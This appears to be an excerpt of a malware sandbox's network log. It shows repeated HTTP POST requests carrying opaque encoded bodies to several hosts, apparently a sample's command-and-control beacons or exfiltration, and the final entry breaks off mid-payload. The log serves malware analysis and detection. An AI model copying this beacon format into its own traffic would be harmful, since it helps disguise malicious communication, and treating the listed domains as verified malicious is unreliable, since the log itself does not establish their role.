                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 4c 56 2f 35 72 41 4f 37 36 57 4f 4a 79 36 4f 5a 43 71 51 62 73 79 79 77 65 57 6d 70 68 66 39 36 35 31 43 47 71 58 65 4f 6b 37 55 33 75 4a 2b 4f 2b 70 63 75 65 37 67 35 7a 68 76 65 45 43 6e 53 76 6a 79 7a 78 2b 48 4c 79 61 7a 56 51 75 4c 47 52 71 4a 35 6e 58 78 49 71 37 55 62 61 76 68 47 55 4f 69 38 6c 50 76 53 51 34 33 4e 47 4b 72 47 49 75 79 39 4e 32 59 75 36 44 76 6f 72 75 33 75 53 4d 4d 7a 41 66 2f 57 53 44 42 39 2b 54 67 6d 72 57 69 37 6a 66 66 68 77 63 51 71 2f 7a 58 68 44 5a 61 43 67 62 52 37 39 67 58 66 34 68 58 70 4d 57 37 30 41 43 66 42 56 42 62 56 68 72 58 78 44 47 4e 6a 51 70 74 2f 51 30 75 62 51 67 76 6d 70 58 4e 4b 2f 30 43 58 69 52 45 4b 6c 32 31 48 59 41 4d 74 4f 68 61 35 38 58 69 78 62 66 57 41 66 77 66 73 68 6f 6d 59 69 6b 74 38 6f 7a 71 41 32 7a 34 43 51 62 79 48 62 67 63 55 48 31 4f 36 62 66 4d 50 53 39 70 43 50 4d 63 53 55 55 43 6c 75 4a 47 30 74 37 58 45 34 6a 70 71 53 64 32 52 36 48 55 70 76 54 4c 41 46 6b 63 59 62 56 6a 4f 33 42 31 31 32 41 30 6d 2f 50 64 63 53 79 47 42 6b 67 32 68 49 4a 4e 69 2f 46 54 74 7a 6b 38 47 42 50 4a 67 4f 47 45 6f 63 6e 30 4f 36 31 4b 6b 61 64 30 75 64 39 2b 33 48 74 46 62 2b 77 56 2b 53 72 61 4b 74 42 46 73 33 50 5a 31 39 42 68 66 69 57 57 65 6e 4f 2f 4f 6c 32 69 4e 63 78 4e 4c 75 77 4b 52 56 32 67 67 58 48 6e 6f 6f 73 6c 51 63 56 45 72 44 31 67 74 64 58 4c 4c 76 2b 6f 37 6f 6b 4f 67 30 75 6d 35 68 67 67 46 35 68 30 63 41 6d 62 2f 6d 56 34 4a 79 6b 52 32 35 42 30 6d 33 71 74 64 5a 75 54 34 48 34 42 65 32 6b 76 37 2b 76 65 32 46 58 71 57 55 45 70 59 50 4c 5a 67 31 2b 4e 45 77 77 6d 64 33 35 37 34 75 36 4a 49 7a 4c 62 55 58 73 46 47 2b 56 68 47 6f 62 41 74 Data Ascii: LV/5rAO76WOJy6OZCqQbsyyweWmphf9651CGqXeOk7U3uJ+O+pcue7g5zhveECnSvjyzx+HLyazVQuLGRqJ5nXxIq7UbavhGUOi8lPvSQ43NGKrGIuy9N2Yu6Dvoru3uSMMzAf/WSDB9+TgmrWi7jffhwcQq/zXhDZaCgbR79gXf4hXpMW70ACfBVBbVhrXxDGNjQpt/Q0ubQgvmpXNK/0CXiREKl21HYAMtOha58XixbfWAfwfshomYikt8ozqA2z4CQbyHbgcUH1O6bfMPS9pCPMcSUUCluJG0t7XE4jpqSd2R6HUpvTLAFkcYbVjO3B112A0m/PdcSyGBkg2hIJNi/FTtzk8GBPJgOGEocn0O61Kkad0ud9+3HtFb+wV+SraKtBFs3PZ19BhfiWWenO/Ol2iNcxNLuwKRV2ggXHnooslQcVErD1gtdXLLv+o7okOg0um5hggF5h0cAmb/mV4JykR25B0m3qtdZuT4H4Be2kv7+ve2FXqWUEpYPLZg1+NEwwmd3574u6JIzLbUXsFG+VhGobAt
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 4c 56 2f 35 72 41 4f 37 36 57 4f 4a 79 36 4f 5a 43 71 51 62 73 79 79 77 65 57 6d 70 68 66 39 36 35 31 43 47 71 58 65 4f 6b 37 55 33 75 4a 2b 4f 2b 70 63 75 65 37 67 35 7a 68 76 65 45 43 6e 53 76 6a 79 7a 78 2b 48 4c 79 61 7a 56 51 75 4c 47 52 71 4a 35 6e 58 78 49 71 37 55 62 61 76 68 47 55 4f 69 38 6c 50 76 53 51 34 33 4e 47 4b 72 47 49 75 79 39 4e 32 59 75 36 44 76 6f 72 75 33 75 53 4d 4d 7a 41 66 2f 57 53 44 42 39 2b 54 67 6d 72 57 69 37 6a 66 66 68 77 63 51 71 2f 7a 58 68 44 5a 61 43 67 62 52 37 39 67 58 66 34 68 58 70 4d 57 37 30 41 43 66 42 56 42 62 56 68 72 58 78 44 47 4e 6a 51 70 74 2f 51 30 75 62 51 67 76 6d 70 58 4e 4b 2f 30 43 58 69 52 45 4b 6c 32 31 48 59 41 4d 74 4f 68 61 35 38 58 69 78 62 66 57 41 66 77 66 73 68 6f 6d 59 69 6b 74 38 6f 7a 71 41 32 7a 34 43 51 62 79 48 62 67 63 55 48 31 4f 36 62 66 4d 50 53 39 70 43 50 4d 63 53 55 55 43 6c 75 4a 47 30 74 37 58 45 34 6a 70 71 53 64 32 52 36 48 55 70 76 54 4c 41 46 6b 63 59 62 56 6a 4f 33 42 31 31 32 41 30 6d 2f 50 64 63 53 79 47 42 6b 67 32 68 49 4a 4e 69 2f 46 54 74 7a 6b 38 47 42 50 4a 67 4f 47 45 6f 63 6e 30 4f 36 31 4b 6b 61 64 30 75 64 39 2b 33 48 74 46 62 2b 77 56 2b 53 72 61 4b 74 42 46 73 33 50 5a 31 39 42 68 66 69 57 57 65 6e 4f 2f 4f 6c 32 69 4e 63 78 4e 4c 75 77 4b 52 56 32 67 67 58 48 6e 6f 6f 73 6c 51 63 56 45 72 44 31 67 74 64 58 4c 4c 76 2b 6f 37 6f 6b 4f 67 30 75 6d 35 68 67 67 46 35 68 30 63 41 6d 62 2f 6d 56 34 4a 79 6b 52 32 35 42 30 6d 33 71 74 64 5a 75 54 34 48 34 42 65 32 6b 76 37 2b 76 65 32 46 58 71 57 55 45 70 59 50 4c 5a 67 31 2b 4e 45 77 77 6d 64 33 35 37 34 75 36 4a 49 7a 4c 62 55 58 73 46 47 2b 56 68 47 6f 62 41 74 Data Ascii: LV/5rAO76WOJy6OZCqQbsyyweWmphf9651CGqXeOk7U3uJ+O+pcue7g5zhveECnSvjyzx+HLyazVQuLGRqJ5nXxIq7UbavhGUOi8lPvSQ43NGKrGIuy9N2Yu6Dvoru3uSMMzAf/WSDB9+TgmrWi7jffhwcQq/zXhDZaCgbR79gXf4hXpMW70ACfBVBbVhrXxDGNjQpt/Q0ubQgvmpXNK/0CXiREKl21HYAMtOha58XixbfWAfwfshomYikt8ozqA2z4CQbyHbgcUH1O6bfMPS9pCPMcSUUCluJG0t7XE4jpqSd2R6HUpvTLAFkcYbVjO3B112A0m/PdcSyGBkg2hIJNi/FTtzk8GBPJgOGEocn0O61Kkad0ud9+3HtFb+wV+SraKtBFs3PZ19BhfiWWenO/Ol2iNcxNLuwKRV2ggXHnooslQcVErD1gtdXLLv+o7okOg0um5hggF5h0cAmb/mV4JykR25B0m3qtdZuT4H4Be2kv7+ve2FXqWUEpYPLZg1+NEwwmd3574u6JIzLbUXsFG+VhGobAt
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 4c 56 2f 35 72 41 4f 37 36 57 4f 4a 79 36 4f 5a 43 71 51 62 73 79 79 77 65 57 6d 70 68 66 39 36 35 31 43 47 71 58 65 4f 6b 37 55 33 75 4a 2b 4f 2b 70 63 75 65 37 67 35 7a 68 76 65 45 43 6e 53 76 6a 79 7a 78 2b 48 4c 79 61 7a 56 51 75 4c 47 52 71 4a 35 6e 58 78 49 71 37 55 62 61 76 68 47 55 4f 69 38 6c 50 76 53 51 34 33 4e 47 4b 72 47 49 75 79 39 4e 32 59 75 36 44 76 6f 72 75 33 75 53 4d 4d 7a 41 66 2f 57 53 44 42 39 2b 54 67 6d 72 57 69 37 6a 66 66 68 77 63 51 71 2f 7a 58 68 44 5a 61 43 67 62 52 37 39 67 58 66 34 68 58 70 4d 57 37 30 41 43 66 42 56 42 62 56 68 72 58 78 44 47 4e 6a 51 70 74 2f 51 30 75 62 51 67 76 6d 70 58 4e 4b 2f 30 43 58 69 52 45 4b 6c 32 31 48 59 41 4d 74 4f 68 61 35 38 58 69 78 62 66 57 41 66 77 66 73 68 6f 6d 59 69 6b 74 38 6f 7a 71 41 32 7a 34 43 51 62 79 48 62 67 63 55 48 31 4f 36 62 66 4d 50 53 39 70 43 50 4d 63 53 55 55 43 6c 75 4a 47 30 74 37 58 45 34 6a 70 71 53 64 32 52 36 48 55 70 76 54 4c 41 46 6b 63 59 62 56 6a 4f 33 42 31 31 32 41 30 6d 2f 50 64 63 53 79 47 42 6b 67 32 68 49 4a 4e 69 2f 46 54 74 7a 6b 38 47 42 50 4a 67 4f 47 45 6f 63 6e 30 4f 36 31 4b 6b 61 64 30 75 64 39 2b 33 48 74 46 62 2b 77 56 2b 53 72 61 4b 74 42 46 73 33 50 5a 31 39 42 68 66 69 57 57 65 6e 4f 2f 4f 6c 32 69 4e 63 78 4e 4c 75 77 4b 52 56 32 67 67 58 48 6e 6f 6f 73 6c 51 63 56 45 72 44 31 67 74 64 58 4c 4c 76 2b 6f 37 6f 6b 4f 67 30 75 6d 35 68 67 67 46 35 68 30 63 41 6d 62 2f 6d 56 34 4a 79 6b 52 32 35 42 30 6d 33 71 74 64 5a 75 54 34 48 34 42 65 32 6b 76 37 2b 76 65 32 46 58 71 57 55 45 70 59 50 4c 5a 67 31 2b 4e 45 77 77 6d 64 33 35 37 34 75 36 4a 49 7a 4c 62 55 58 73 46 47 2b 56 68 47 6f 62 41 74 Data Ascii: LV/5rAO76WOJy6OZCqQbsyyweWmphf9651CGqXeOk7U3uJ+O+pcue7g5zhveECnSvjyzx+HLyazVQuLGRqJ5nXxIq7UbavhGUOi8lPvSQ43NGKrGIuy9N2Yu6Dvoru3uSMMzAf/WSDB9+TgmrWi7jffhwcQq/zXhDZaCgbR79gXf4hXpMW70ACfBVBbVhrXxDGNjQpt/Q0ubQgvmpXNK/0CXiREKl21HYAMtOha58XixbfWAfwfshomYikt8ozqA2z4CQbyHbgcUH1O6bfMPS9pCPMcSUUCluJG0t7XE4jpqSd2R6HUpvTLAFkcYbVjO3B112A0m/PdcSyGBkg2hIJNi/FTtzk8GBPJgOGEocn0O61Kkad0ud9+3HtFb+wV+SraKtBFs3PZ19BhfiWWenO/Ol2iNcxNLuwKRV2ggXHnooslQcVErD1gtdXLLv+o7okOg0um5hggF5h0cAmb/mV4JykR25B0m3qtdZuT4H4Be2kv7+ve2FXqWUEpYPLZg1+NEwwmd3574u6JIzLbUXsFG+VhGobAt
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 30 77 75 4d 71 41 59 46 77 47 4e 64 79 61 73 42 49 5a 6a 46 54 43 6d 67 4d 63 5a 6d 64 33 6a 70 6d 6a 45 61 42 61 61 76 75 51 30 43 49 64 6c 53 38 35 66 72 2f 6a 4a 47 44 6c 37 30 59 70 49 54 5a 42 79 48 55 6c 70 6a 73 71 59 35 63 74 6b 71 35 53 2f 37 39 4d 59 52 66 36 52 33 44 2f 78 70 4c 42 74 4e 74 55 59 57 7a 71 59 4e 38 32 62 58 76 4d 6a 68 4c 38 53 70 4f 58 36 76 6a 38 65 70 58 43 6e 30 39 46 2b 4a 30 39 4e 4e 5a 47 6e 35 7a 2f 75 79 6b 43 76 2b 51 67 6c 41 41 52 34 33 2b 5a 46 61 36 4f 79 31 76 70 55 53 70 44 45 79 32 6b 33 37 37 4f 6a 51 76 55 4e 62 6e 6d 68 59 48 42 4c 69 48 69 64 46 4f 42 2f 68 4d 34 35 77 63 38 37 79 57 57 74 44 45 51 6b 5a 6f 6b 4e 49 38 76 45 47 2f 42 64 45 66 71 73 30 51 70 35 65 6f 34 37 55 44 53 6d 51 58 7a 32 2f 41 42 57 66 6a 71 65 68 63 43 67 34 30 6b 56 30 76 58 38 46 6e 74 4e 2b 38 45 31 56 50 55 66 34 52 46 4a 59 7a 64 68 32 61 44 6c 53 63 34 41 51 6c 4f 48 55 70 2b 50 32 31 78 65 4a 67 2f 78 51 69 58 30 53 35 32 30 39 62 78 62 53 79 58 67 52 71 43 70 33 30 5a 6d 48 7a 78 77 37 79 43 2f 72 79 73 74 5a 69 62 2b 62 31 64 37 30 5a 59 2b 61 2b 64 6f 77 6c 42 78 68 4b 41 77 49 75 79 59 5a 6e 79 43 76 70 2f 6f 44 44 4c 46 53 68 62 38 69 64 61 74 7a 75 4f 64 56 62 7a 5a 74 4c 4c 34 57 6b 50 32 4b 70 6f 35 76 64 6e 69 49 2f 62 56 71 4a 38 4a 39 5a 61 66 31 73 37 51 6c 39 37 55 30 54 6f 52 49 2f 42 71 37 4a 6a 51 30 66 44 34 34 7a 50 2f 6e 6b 53 6f 61 45 53 4b 46 51 48 69 41 6d 5a 4d 39 7a 36 49 74 73 71 47 62 6d 76 6f 36 31 38 78 6c 32 4c 53 42 63 37 69 58 71 39 47 59 6b 71 72 6c 77 6d 76 6c 4d 37 61 30 67 68 67 67 45 65 4a 72 47 2b 5a 59 50 4e 7a 6a 36 4a 52 50 33 70 6d 77 55 67 5a 54 55 38 35 4e 2b 33 55 4d 73 41 33 34 36 67 3d 3d Data Ascii: 0wuMqAYFwGNdyasBIZjFTCmgMcZmd3jpmjEaBaavuQ0CIdlS85fr/jJGDl70YpITZByHUlpjsqY5ctkq5S/79MYRf6R3D/xpLBtNtUYWzqYN82bXvMjhL8SpOX6vj8epXCn09F+J09NNZGn5z/uykCv+QglAAR43+ZFa6Oy1vpUSpDEy2k377OjQvUNbnmhYHBLiHidFOB/hM45wc87yWWtDEQkZokNI8vEG/BdEfqs0Qp5eo47UDSmQXz2/ABWfjqehcCg40kV0vX8FntN+8E1VPUf4RFJYzdh2aDlSc4AQlOHUp+P21xeJg/xQiX0S5209bxbSyXgRqCp30ZmHzxw7yC/rystZib+b1d70ZY+a+dowlBxhKAwIuyYZnyCvp/oDDLFShb8idatzuOdVbzZtLL4WkP2Kpo5vdniI/bVqJ8J9Zaf1s7Ql97U0ToRI/Bq7JjQ0fD44zP/nkSoaESKFQHiAmZM9z6ItsqGbmvo618xl2LSBc7iXq9GYkqrlwmvlM7a0ghggEeJrG+ZYPNzj6JRP3pmwUgZTU85N+3UMsA346g==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 6e 67 37 58 72 54 58 43 36 57 4f 47 57 79 6f 34 6e 4f 37 62 61 53 35 6f 42 48 33 44 65 59 36 32 4f 59 4b 72 32 4b 78 6d 46 31 33 64 75 38 4b 74 45 79 71 73 4a 49 78 52 54 31 6b 53 6f 57 74 6c 69 53 66 68 69 2b 51 34 65 52 62 30 2f 74 4a 39 73 73 70 41 49 34 42 6b 4d 52 65 39 7a 33 55 6c 43 74 72 45 6f 63 64 61 55 52 74 6c 43 30 31 71 42 33 47 65 64 49 77 61 69 5a 6c 61 57 36 51 4b 43 63 54 51 62 43 48 50 33 61 67 53 46 34 49 42 6b 6e 38 56 34 43 47 55 4c 4b 4f 6c 2f 79 4c 4a 59 31 33 47 53 44 36 6b 66 63 77 77 64 32 73 71 66 71 42 68 57 58 33 69 43 6f 55 2b 38 7a 33 42 4d 4e 70 64 62 59 53 6e 52 30 56 50 70 6f 71 5a 31 32 74 4c 70 57 57 56 74 67 68 30 30 79 2f 78 61 76 67 34 73 79 70 45 4f 41 4f 61 36 65 55 4b 62 48 64 59 43 74 43 77 2b 2b 69 56 39 72 51 32 57 72 2b 68 46 46 72 5a 45 68 46 2b 6a 34 59 4b 74 46 62 47 4c 37 78 51 2f 4e 47 50 52 33 66 68 47 6c 62 30 38 32 78 50 37 48 65 41 49 4f 70 48 7a 6b 64 41 63 47 61 71 51 78 54 67 41 46 6b 37 45 6f 5a 34 62 76 64 69 69 6f 62 65 54 73 6a 5a 37 76 6e 79 78 37 4e 62 74 71 6c 6a 76 6f 38 2f 7a 79 74 59 4c 6b 61 77 63 6b 75 6c 71 6b 79 36 78 64 4e 38 33 38 35 46 37 72 52 53 64 54 66 4b 2f 4c 59 57 51 33 55 4e 32 73 37 66 48 69 56 6d 58 35 4e 46 42 2b 47 64 47 72 50 6f 49 67 41 66 73 43 51 54 38 2b 74 74 47 47 32 54 61 36 62 4d 50 59 71 35 41 62 5a 43 59 72 52 32 4d 58 45 37 4d 32 31 6b 48 7a 37 56 41 52 71 7a 79 36 38 41 45 54 4c 74 4a 54 48 6c 66 37 58 44 52 6a 39 4d 4b 74 64 36 52 2b 58 38 59 65 34 62 45 48 66 75 4c 62 68 62 30 32 58 67 39 4e 63 48 57 77 4e 71 54 55 4c 48 4b 51 41 5a 4e 73 70 6b 41 73 36 67 71 35 51 4f 2f 46 71 6d 34 2b 54 6c 43 69 64 61 50 49 4d 77 Data Ascii: ng7XrTXC6WOGWyo4nO7baS5oBH3DeY62OYKr2KxmF13du8KtEyqsJIxRT1kSoWtliSfhi+Q4eRb0/tJ9sspAI4BkMRe9z3UlCtrEocdaURtlC01qB3GedIwaiZlaW6QKCcTQbCHP3agSF4IBkn8V4CGULKOl/yLJY13GSD6kfcwwd2sqfqBhWX3iCoU+8z3BMNpdbYSnR0VPpoqZ12tLpWWVtgh00y/xavg4sypEOAOa6eUKbHdYCtCw++iV9rQ2Wr+hFFrZEhF+j4YKtFbGL7xQ/NGPR3fhGlb082xP7HeAIOpHzkdAcGaqQxTgAFk7EoZ4bvdiiobeTsjZ7vnyx7Nbtqljvo8/zytYLkawckulqky6xdN8385F7rRSdTfK/LYWQ3UN2s7fHiVmX5NFB+GdGrPoIgAfsCQT8+ttGG2Ta6bMPYq5AbZCYrR2MXE7M21kHz7VARqzy68AETLtJTHlf7XDRj9MKtd6R+X8Ye4bEHfuLbhb02Xg9NcHWwNqTULHKQAZNspkAs6gq5QO/Fqm4+TlCidaPIMw
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 4c 56 2f 35 72 41 4f 37 36 57 4f 4a 79 36 4f 5a 43 71 51 62 73 79 79 77 65 57 6d 70 68 66 39 36 35 31 43 47 71 58 65 4f 6b 37 55 33 75 4a 2b 4f 2b 70 63 75 65 37 67 35 7a 68 76 65 45 43 6e 53 76 6a 79 7a 78 2b 48 4c 79 61 7a 56 51 75 4c 47 52 71 4a 35 6e 58 78 49 71 37 55 62 61 76 68 47 55 4f 69 38 6c 50 76 53 51 34 33 4e 47 4b 72 47 49 75 79 39 4e 32 59 75 36 44 76 6f 72 75 33 75 53 4d 4d 7a 41 66 2f 57 53 44 42 39 2b 54 67 6d 72 57 69 37 6a 66 66 68 77 63 51 71 2f 7a 58 68 44 5a 61 43 67 62 52 37 39 67 58 66 34 68 58 70 4d 57 37 30 41 43 66 42 56 42 62 56 68 72 58 78 44 47 4e 6a 51 70 74 2f 51 30 75 62 51 67 76 6d 70 58 4e 4b 2f 30 43 58 69 52 45 4b 6c 32 31 48 59 41 4d 74 4f 68 61 35 38 58 69 78 62 66 57 41 66 77 66 73 68 6f 6d 59 69 6b 74 38 6f 7a 71 41 32 7a 34 43 51 62 79 48 62 67 63 55 48 31 4f 36 62 66 4d 50 53 39 70 43 50 4d 63 53 55 55 43 6c 75 4a 47 30 74 37 58 45 34 6a 70 71 53 64 32 52 36 48 55 70 76 54 4c 41 46 6b 63 59 62 56 6a 4f 33 42 31 31 32 41 30 6d 2f 50 64 63 53 79 47 42 6b 67 32 68 49 4a 4e 69 2f 46 54 74 7a 6b 38 47 42 50 4a 67 4f 47 45 6f 63 6e 30 4f 36 31 4b 6b 61 64 30 75 64 39 2b 33 48 74 46 62 2b 77 56 2b 53 72 61 4b 74 42 46 73 33 50 5a 31 39 42 68 66 69 57 57 65 6e 4f 2f 4f 6c 32 69 4e 63 78 4e 4c 75 77 4b 52 56 32 67 67 58 48 6e 6f 6f 73 6c 51 63 56 45 72 44 31 67 74 64 58 4c 4c 76 2b 6f 37 6f 6b 4f 67 30 75 6d 35 68 67 67 46 35 68 30 63 41 6d 62 2f 6d 56 34 4a 79 6b 52 32 35 42 30 6d 33 71 74 64 5a 75 54 34 48 34 42 65 32 6b 76 37 2b 76 65 32 46 58 71 57 55 45 70 59 50 4c 5a 67 31 2b 4e 45 77 77 6d 64 33 35 37 34 75 36 4a 49 7a 4c 62 55 58 73 46 47 2b 56 68 47 6f 62 41 74 Data Ascii: LV/5rAO76WOJy6OZCqQbsyyweWmphf9651CGqXeOk7U3uJ+O+pcue7g5zhveECnSvjyzx+HLyazVQuLGRqJ5nXxIq7UbavhGUOi8lPvSQ43NGKrGIuy9N2Yu6Dvoru3uSMMzAf/WSDB9+TgmrWi7jffhwcQq/zXhDZaCgbR79gXf4hXpMW70ACfBVBbVhrXxDGNjQpt/Q0ubQgvmpXNK/0CXiREKl21HYAMtOha58XixbfWAfwfshomYikt8ozqA2z4CQbyHbgcUH1O6bfMPS9pCPMcSUUCluJG0t7XE4jpqSd2R6HUpvTLAFkcYbVjO3B112A0m/PdcSyGBkg2hIJNi/FTtzk8GBPJgOGEocn0O61Kkad0ud9+3HtFb+wV+SraKtBFs3PZ19BhfiWWenO/Ol2iNcxNLuwKRV2ggXHnooslQcVErD1gtdXLLv+o7okOg0um5hggF5h0cAmb/mV4JykR25B0m3qtdZuT4H4Be2kv7+ve2FXqWUEpYPLZg1+NEwwmd3574u6JIzLbUXsFG+VhGobAt
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 4c 56 2f 35 72 41 4f 37 36 57 4f 4a 79 36 4f 5a 43 71 51 62 73 79 79 77 65 57 6d 70 68 66 39 36 35 31 43 47 71 58 65 4f 6b 37 55 33 75 4a 2b 4f 2b 70 63 75 65 37 67 35 7a 68 76 65 45 43 6e 53 76 6a 79 7a 78 2b 48 4c 79 61 7a 56 51 75 4c 47 52 71 4a 35 6e 58 78 49 71 37 55 62 61 76 68 47 55 4f 69 38 6c 50 76 53 51 34 33 4e 47 4b 72 47 49 75 79 39 4e 32 59 75 36 44 76 6f 72 75 33 75 53 4d 4d 7a 41 66 2f 57 53 44 42 39 2b 54 67 6d 72 57 69 37 6a 66 66 68 77 63 51 71 2f 7a 58 68 44 5a 61 43 67 62 52 37 39 67 58 66 34 68 58 70 4d 57 37 30 41 43 66 42 56 42 62 56 68 72 58 78 44 47 4e 6a 51 70 74 2f 51 30 75 62 51 67 76 6d 70 58 4e 4b 2f 30 43 58 69 52 45 4b 6c 32 31 48 59 41 4d 74 4f 68 61 35 38 58 69 78 62 66 57 41 66 77 66 73 68 6f 6d 59 69 6b 74 38 6f 7a 71 41 32 7a 34 43 51 62 79 48 62 67 63 55 48 31 4f 36 62 66 4d 50 53 39 70 43 50 4d 63 53 55 55 43 6c 75 4a 47 30 74 37 58 45 34 6a 70 71 53 64 32 52 36 48 55 70 76 54 4c 41 46 6b 63 59 62 56 6a 4f 33 42 31 31 32 41 30 6d 2f 50 64 63 53 79 47 42 6b 67 32 68 49 4a 4e 69 2f 46 54 74 7a 6b 38 47 42 50 4a 67 4f 47 45 6f 63 6e 30 4f 36 31 4b 6b 61 64 30 75 64 39 2b 33 48 74 46 62 2b 77 56 2b 53 72 61 4b 74 42 46 73 33 50 5a 31 39 42 68 66 69 57 57 65 6e 4f 2f 4f 6c 32 69 4e 63 78 4e 4c 75 77 4b 52 56 32 67 67 58 48 6e 6f 6f 73 6c 51 63 56 45 72 44 31 67 74 64 58 4c 4c 76 2b 6f 37 6f 6b 4f 67 30 75 6d 35 68 67 67 46 35 68 30 63 41 6d 62 2f 6d 56 34 4a 79 6b 52 32 35 42 30 6d 33 71 74 64 5a 75 54 34 48 34 42 65 32 6b 76 37 2b 76 65 32 46 58 71 57 55 45 70 59 50 4c 5a 67 31 2b 4e 45 77 77 6d 64 33 35 37 34 75 36 4a 49 7a 4c 62 55 58 73 46 47 2b 56 68 47 6f 62 41 74 Data Ascii: LV/5rAO76WOJy6OZCqQbsyyweWmphf9651CGqXeOk7U3uJ+O+pcue7g5zhveECnSvjyzx+HLyazVQuLGRqJ5nXxIq7UbavhGUOi8lPvSQ43NGKrGIuy9N2Yu6Dvoru3uSMMzAf/WSDB9+TgmrWi7jffhwcQq/zXhDZaCgbR79gXf4hXpMW70ACfBVBbVhrXxDGNjQpt/Q0ubQgvmpXNK/0CXiREKl21HYAMtOha58XixbfWAfwfshomYikt8ozqA2z4CQbyHbgcUH1O6bfMPS9pCPMcSUUCluJG0t7XE4jpqSd2R6HUpvTLAFkcYbVjO3B112A0m/PdcSyGBkg2hIJNi/FTtzk8GBPJgOGEocn0O61Kkad0ud9+3HtFb+wV+SraKtBFs3PZ19BhfiWWenO/Ol2iNcxNLuwKRV2ggXHnooslQcVErD1gtdXLLv+o7okOg0um5hggF5h0cAmb/mV4JykR25B0m3qtdZuT4H4Be2kv7+ve2FXqWUEpYPLZg1+NEwwmd3574u6JIzLbUXsFG+VhGobAt
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 4e 74 5a 32 6b 44 30 65 38 57 4d 30 46 4a 68 4b 39 4d 71 75 56 58 59 4a 73 77 42 72 6d 72 61 36 77 64 71 70 53 50 61 6f 33 45 74 74 6e 59 37 57 6e 48 37 55 4e 64 4e 55 6f 6d 5a 55 6e 4e 30 54 6d 76 43 38 7a 43 32 4c 6c 54 66 74 7a 4f 2b 48 55 43 46 53 74 64 38 6b 74 46 43 6c 48 55 66 33 57 33 32 31 6d 47 2f 4b 4e 61 59 35 61 70 6b 56 58 59 38 67 63 70 47 34 51 2f 77 50 31 59 6b 51 4e 4c 61 45 45 31 76 30 2b 79 32 43 30 55 42 31 42 6f 72 52 67 2b 59 70 45 45 76 79 53 75 78 44 4c 2f 48 54 54 32 69 47 44 75 6c 7a 70 46 38 2b 75 42 6b 6e 2f 78 73 73 2b 55 38 38 72 52 35 78 50 67 5a 50 58 5a 58 42 54 67 63 57 57 67 46 79 66 30 51 4c 4e 59 42 65 4d 42 75 79 35 69 77 4f 36 63 44 58 44 34 58 69 4e 55 4d 52 62 79 69 50 78 47 6f 35 53 5a 61 75 43 55 41 2f 71 30 6e 32 54 76 76 41 4b 66 6a 2f 31 4c 64 6d 53 65 43 59 6c 71 4c 38 6b 55 7a 44 32 79 6c 61 47 65 64 6e 72 6d 2b 53 79 71 48 6c 30 41 35 4b 48 65 4e 62 6a 6b 64 4b 4d 53 45 6f 48 30 48 63 67 43 68 2b 67 77 4d 48 77 41 67 6b 4b 63 71 30 54 6c 57 49 46 4d 72 51 79 6e 4a 55 58 62 50 53 38 64 48 74 35 52 54 30 43 47 76 72 54 73 4f 68 36 6d 6f 35 79 65 68 53 49 30 55 4f 47 2b 50 4e 63 67 67 71 54 5a 42 6c 30 6e 4e 7a 4e 35 56 43 51 38 47 52 38 4b 5a 6c 47 58 31 49 39 70 65 47 37 5a 62 4d 61 4a 41 50 37 66 74 4c 77 53 42 32 54 77 52 69 45 74 63 47 39 6a 46 72 58 4a 4b 4a 30 61 61 4b 56 72 46 74 46 49 2b 4d 59 53 55 66 4b 41 6b 61 49 4c 67 74 6b 7a 2b 62 65 50 67 6c 54 64 6d 76 77 63 61 63 45 69 37 47 6f 50 79 73 68 57 37 6d 71 4b 79 6a 5a 49 59 44 71 63 78 72 5a 69 37 4f 41 70 76 62 7a 46 67 7a 78 38 64 73 4f 62 4e 42 74 75 7a 6f 55 6d 56 2f 4b 2b 62 76 63 77 43 2f 48 77 31 54 4a 4e 78 55 65 58 70 50 6a 61 74 4d 43 63 76 59 48 59 47 2f Data Ascii: 